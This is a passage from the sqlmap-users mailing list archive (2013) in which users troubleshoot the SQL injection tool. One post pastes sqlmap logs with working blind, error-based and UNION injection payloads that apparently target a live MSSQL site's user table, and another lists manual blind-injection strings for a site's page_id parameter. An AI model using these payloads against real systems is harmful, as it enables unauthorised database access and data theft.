back-end DBMS to user defined value > [00:51:25] [WARNING] it appears that you have provided tainted parameter > values ('major=')waitfor delay'0:0:20'--') with most probably leftover > chars/statements from manual SQL injection test(s). Please, always use only > valid parameter values so sqlmap could be able to run properly > Are you sure you want to continue? [y/N] y > [00:51:26] [INFO] testing connection to the target URL > [00:51:49] [DEBUG] declared web page charset 'gb2312' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: major > Type: boolean-based blind > Title: OR boolean-based blind - WHERE or HAVING clause > Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND > ('IRZo'='IRZo&station=&idxpage=2&ptopid= > Vector: OR ([INFERENCE]) > > Type: error-based > Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING > clause > Payload: classid=&specialid=2&qstr=&major=-3052') OR > 5359=CONVERT(INT,(SELECT > CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN > (5359=5359) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND > ('PLJO'='PLJO&station=&idxpage=2&ptopid= > Vector: OR [RANDNUM]=CONVERT(INT,(SELECT > '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) > > Type: UNION query > Title: Generic UNION query (random number) - 16 columns > Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT > CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654-- > &station=&idxpage=2&ptopid= > Vector: UNION ALL SELECT > [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026-- > > --- > [00:51:49] [WARNING] changes made by tampering scripts are not included in > shown payload content(s) > [00:51:49] [INFO] testing Microsoft SQL Server > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [INFO] confirming Microsoft SQL Server > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [PAYLOAD] > LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g > [00:51:50] [DEBUG] performed 1 queries in 0.57 seconds > [00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0 > back-end DBMS: Microsoft SQL Server 2008 > [00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in > database 'vls3db4' > [00:51:50] [INFO] the SQL query used returns 1 entries > [00:51:50] [DEBUG] performed 0 queries in 0.02 seconds > [00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table > 'dd_users' in database 'vls3db4' > [00:51:50] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]' > > Traceback (most recent call last): > File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in > emit > message = stdoutencode(self.format(record)) > File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode > retVal = data.encode(UNICODE_ENCODING) > UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688: > ordinal not in range(128) > Logged from file sqlmap.py, line 125 > Traceback (most recent call last): > File "./sqlmap.py", line 95, in main > start() > File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start > action() > File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action > conf.dbmsHandler.dumpTable() > File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in > dumpTable > retVal = pivotDumpTable(table, colList, blind=False) > File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in > pivotDumpTable > value = inject.getValue(query, blind=blind, union=not blind, error=not > blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) > File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue > value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else > query, unpack, dump) > File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion > output = unionUse(expression, unpack=unpack, dump=dump) > File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in > unionUse > output = _oneShotUnionUse(expression, unpack) > File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in > _oneShotUnionUse > page, headers = Request.queryPage(payload, content=True, > raise404=False) > File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage > payload = function(payload=payload, headers=auxHeaders) > File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper > return base64.b64encode(payload) if payload else payload > File "/usr/lib/python2.7/base64.py", line 53, in b64encode > encoded = binascii.b2a_base64(s)[:-1] > UnicodeEncodeError: 'ascii' codec can't encode characters in position > 147-152: ordinal not in range(128) > > [*] shutting down at 00:51:50 > > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13. > http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: 沸水浮冰 <sf...@gm...> - 2013-09-21 02:55:29
|
root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' --dbms=mssql
--level=5 --risk=3 --tamper=base64encode -D vls3db4 -T dbo.dd_users -C
'最后登录时间' --dump --hex -v 3
sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 00:51:25
[00:51:25] [INFO] parsing HTTP request from 'file2'
[00:51:25] [DEBUG] not a valid WebScarab log data
[00:51:25] [DEBUG] cleaning up configuration parameters
[00:51:25] [INFO] loading tamper script 'base64encode'
[00:51:25] [DEBUG] setting the HTTP timeout
[00:51:25] [DEBUG] setting the HTTP method to GET
[00:51:25] [DEBUG] creating HTTP requests opener object
[00:51:25] [DEBUG] forcing back-end DBMS to user defined value
[00:51:25] [WARNING] it appears that you have provided tainted parameter
values ('major=')waitfor delay'0:0:20'--') with most probably leftover
chars/statements from manual SQL injection test(s). Please, always use only
valid parameter values so sqlmap could be able to run properly
Are you sure you want to continue? [y/N] y
[00:51:26] [INFO] testing connection to the target URL
[00:51:49] [DEBUG] declared web page charset 'gb2312'
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: major
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
('IRZo'='IRZo&station=&idxpage=2&ptopid=
Vector: OR ([INFERENCE])
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
clause
Payload: classid=&specialid=2&qstr=&major=-3052') OR
5359=CONVERT(INT,(SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
(5359=5359) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
('PLJO'='PLJO&station=&idxpage=2&ptopid=
Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
'[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
Type: UNION query
Title: Generic UNION query (random number) - 16 columns
Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
&station=&idxpage=2&ptopid=
Vector: UNION ALL SELECT
[QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
---
[00:51:49] [WARNING] changes made by tampering scripts are not included in
shown payload content(s)
[00:51:49] [INFO] testing Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [INFO] confirming Microsoft SQL Server
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:49] [PAYLOAD]
LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
[00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
[00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
database 'vls3db4'
[00:51:50] [INFO] the SQL query used returns 1 entries
[00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
[00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
'dd_users' in database 'vls3db4'
[00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
[00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
Traceback (most recent call last):
File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in emit
message = stdoutencode(self.format(record))
File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
retVal = data.encode(UNICODE_ENCODING)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
ordinal not in range(128)
Logged from file sqlmap.py, line 125
Traceback (most recent call last):
File "./sqlmap.py", line 95, in main
start()
File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
action()
File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
conf.dbmsHandler.dumpTable()
File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
dumpTable
retVal = pivotDumpTable(table, colList, blind=False)
File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
pivotDumpTable
value = inject.getValue(query, blind=blind, union=not blind, error=not
blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
query, unpack, dump)
File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
output = unionUse(expression, unpack=unpack, dump=dump)
File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
unionUse
output = _oneShotUnionUse(expression, unpack)
File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
_oneShotUnionUse
page, headers = Request.queryPage(payload, content=True, raise404=False)
File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
payload = function(payload=payload, headers=auxHeaders)
File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
return base64.b64encode(payload) if payload else payload
File "/usr/lib/python2.7/base64.py", line 53, in b64encode
encoded = binascii.b2a_base64(s)[:-1]
UnicodeEncodeError: 'ascii' codec can't encode characters in position
147-152: ordinal not in range(128)
[*] shutting down at 00:51:50
|
|
From: Chris O. <chr...@gm...> - 2013-09-19 16:13:22
|
You have spaces across your URL... On 19 September 2013 17:05, Edward Oursted <eou...@ya...> wrote: > page_id' is not recognized as an internal or external command, operable > program or batch file. > how to me fix it ? > > when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 > --dbs --dbms=MySQL > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/20/13. > http://pubads.g.doubleclick.net/gampad/clk?id=58041151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2013-09-19 16:13:03
|
sqlmap.py -u *"*site.com / index.php? id = 2 & page_id = 200*"* --dbs --dbms=MySQL bye p.s. notice the double quotes On Thu, Sep 19, 2013 at 6:05 PM, Edward Oursted <eou...@ya...> wrote: > page_id' is not recognized as an internal or external command, operable > program or batch file. > how to me fix it ? > > when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 > --dbs --dbms=MySQL > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/20/13. > http://pubads.g.doubleclick.net/gampad/clk?id=58041151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Edward O. <eou...@ya...> - 2013-09-19 16:08:28
|
page_id' is not recognized as an internal or external command, operable program or batch file. how to me fix it ? when I have used sqlmap.py-u site.com / index.php? id = 2 & page_id = 200 --dbs --dbms=MySQL |
|
From: dark s. <dar...@go...> - 2013-09-19 10:54:46
|
To whom it may concern. Hello there, today while I was testing a friend webpage I got the error: [WARNING] unknown charset 'it' the meta tag of the site: <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> Kind Regards, ds |
|
From: Amir A. <the...@ho...> - 2013-09-16 16:11:22
|
Actually seems my problems were due to the version of sqlmap with BackTrack - I got the latest version and it works as expected... Date: Sat, 14 Sep 2013 08:52:21 +0200 Subject: Re: [sqlmap-users] Injecting into the body of a post From: mir...@gm... To: the...@ho... CC: sql...@li... Have you tried googling? There are literally hundreds of how tos. http://bit.ly/18Zjw2i Bye On Sep 14, 2013 12:20 AM, "Amir A." <the...@ho...> wrote: I;ve been trying to get SQL Map to attack the body of the post (one line of code with username, password in it) and I am unable to do so. Everything I read talks about attacking the the URL but how can you attack something thats in the post body? Great tool though, used it with burp suite! Thanks! ------------------------------------------------------------------------------ How ServiceNow helps IT people transform IT departments: 1. Consolidate legacy IT systems to a single system of record for IT 2. Standardize and globalize service processes across IT 3. Implement zero-touch automation to replace manual, redundant tasks http://pubads.g.doubleclick.net/gampad/clk?id=51271111&iu=/4140/ostg.clktrk _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Miroslav S. <mir...@gm...> - 2013-09-16 06:58:24
|
Hi. You haven't told what were the results of sqlmap running against that target. sqlmap is trying to use payloads like: validstring' and 'a'='a by default. From your description this looks like it could be a MsAccess. Kind regards, Miroslav Stampar On Mon, Sep 16, 2013 at 4:53 AM, Rashmi Singh <ras...@gm...> wrote: > I have spent ages to test website with help of sqlmap but no success, so i > decided to post here for help with experts > > Website is vulnerable to blind sql injection, but i want sqlmap to help me > but i dont know how to make it work by choosing correct sqlmap commandline > options. > > I tell you whole picture of the injection. > > There are many post parameters but vulnerable paramater is only one, so > below is the whole picture > > 1) blind sql injection is on https > > 2) vulnerable parameter is page_id POST param > > 3) blind injection work with following payload only. > > page_id=validstring' and 'a'='a > > With above payload page loads normally but if i use like below > > page_id=validstring' and 'a'='a'-- > > Or > > page_id=validstring' and 'a'='a'# > > Or > > page_id=validstring' and 'a'='a'--+- > > Or > > page_id=validstring' and 'a'='a'%00 > > Or > > page_id=validstring' and 'a'='a'/* > > Blind just does not work and page does not load normally. > > So im not sure how to terminate the query by myself with comments. Because > no comment is working and i dont know what database is being used by the > application. > > So thats y i want sqlmap to help me. > > Please help me with correct sqlmap commands with all correct options so i > can make it work. > > Thank you very much > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/20/13. > http://pubads.g.doubleclick.net/gampad/clk?id=58041151&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Rashmi S. <ras...@gm...> - 2013-09-16 02:53:18
|
I have spent ages to test website with help of sqlmap but no success, so i decided to post here for help with experts Website is vulnerable to blind sql injection, but i want sqlmap to help me but i dont know how to make it work by choosing correct sqlmap commandline options. I tell you whole picture of the injection. There are many post parameters but vulnerable paramater is only one, so below is the whole picture 1) blind sql injection is on https 2) vulnerable parameter is page_id POST param 3) blind injection work with following payload only. page_id=validstring' and 'a'='a With above payload page loads normally but if i use like below page_id=validstring' and 'a'='a'-- Or page_id=validstring' and 'a'='a'# Or page_id=validstring' and 'a'='a'--+- Or page_id=validstring' and 'a'='a'%00 Or page_id=validstring' and 'a'='a'/* Blind just does not work and page does not load normally. So im not sure how to terminate the query by myself with comments. Because no comment is working and i dont know what database is being used by the application. So thats y i want sqlmap to help me. Please help me with correct sqlmap commands with all correct options so i can make it work. Thank you very much |
48 messages has been excluded from this view by a project administrator.
